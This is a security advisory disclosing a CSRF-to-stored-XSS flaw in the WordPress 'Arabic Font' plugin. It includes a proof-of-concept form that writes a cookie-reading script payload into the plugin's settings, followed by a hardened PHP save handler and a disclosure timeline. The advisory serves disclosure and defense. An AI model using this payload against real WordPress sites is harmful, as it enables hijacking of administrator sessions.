Because the settings-save request handled by arabic-font.php and /inc/panel.php has no CSRF protection, and the saved values are echoed back without entity encoding, an attacker can store a script payload in the plugin settings that is then executed in the context of an admin user.

CVSS Score


CVSS Vector


Versions Affected

1.2 and below


There is no official update to resolve this, but an unofficial patch has been included in this disclosure.

Unofficial Patch

The patched plugin can be found here: https://drive.google.com/file/d/1OWUiPZIQPKIc00hMocr6EukOPoHMWsHZ/view?usp=sharing

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>
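As an added illustration, not code from the plugin or from the unofficial patch linked above, the settings form and save handler with the two missing controls: a nonce check that rejects the cross-site POST, and esc_attr() on the stored value so the quote breakout in the AF_defaultcssclass payload is rendered inert. The option name af_settings, the nonce action name and the function names are assumptions; the field names are those used by the proof of concept.

```php
<?php
// Added example (not the plugin's code or the unofficial patch):
// a hardened settings form and save handler for inc/panel.php.
// 'af_settings', 'af_save_settings' and 'af_nonce' are assumed names.

// 1. CSRF: the settings form carries a nonce tied to the logged-in user,
//    which a form hosted on another site cannot obtain.
function af_render_settings_form() {
    $opts  = get_option( 'af_settings', array() );
    $class = isset( $opts['AF_defaultcssclass'] ) ? $opts['AF_defaultcssclass'] : '';
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'af_save_settings', 'af_nonce' ); ?>
        <!-- 2. Output encoding: esc_attr() turns " and > into entities, so a
             stored value such as .arab"><script>... stays inside the attribute. -->
        <input type="text" name="AF_defaultcssclass"
               value="<?php echo esc_attr( $class ); ?>">
        <input type="submit" name="save1" value="Save changes">
    </form>
    <?php
}

// 3. Save handler: refuse requests without the capability or a valid nonce,
//    then sanitize every field before it is stored.
function af_save_settings() {
    if ( ! isset( $_POST['save1'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // Stops with a 403 page when the nonce is missing, expired or forged.
    check_admin_referer( 'af_save_settings', 'af_nonce' );

    $fields = array( 'AF_fontfamily', 'AF_fontsize', 'AF_lineheight',
                     'AF_textalign', 'AF_defaultcssclass', 'AF_customcss' );
    $clean  = array();
    foreach ( $fields as $f ) {
        $clean[ $f ] = isset( $_POST[ $f ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $f ] ) )
            : '';
    }
    // Numeric settings are coerced to non-negative integers.
    $clean['AF_fontsize']   = absint( $clean['AF_fontsize'] );
    $clean['AF_lineheight'] = absint( $clean['AF_lineheight'] );
    update_option( 'af_settings', $clean );
}
add_action( 'admin_init', 'af_save_settings' );
```

Either control alone breaks the chain shown above: the nonce stops the cross-site write, and the output encoding stops a stored value from breaking out of the attribute if a write does get through.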

WordPress Exploit Framework Module




Disclosure Timeline

  • 2017-07-18: Initial discovery
  • 2017-07-18: Contacted vendor with proof of concept and details of the vulnerabilities
  • 2017-07-20: Contacted WordPress to report vulnerability
  • 2017-07-20: Plugin removed from WordPress repository
  • 2017-07-20: Developed an unofficial patch in lieu of the vendor producing one
  • 2017-07-20: Released public disclosure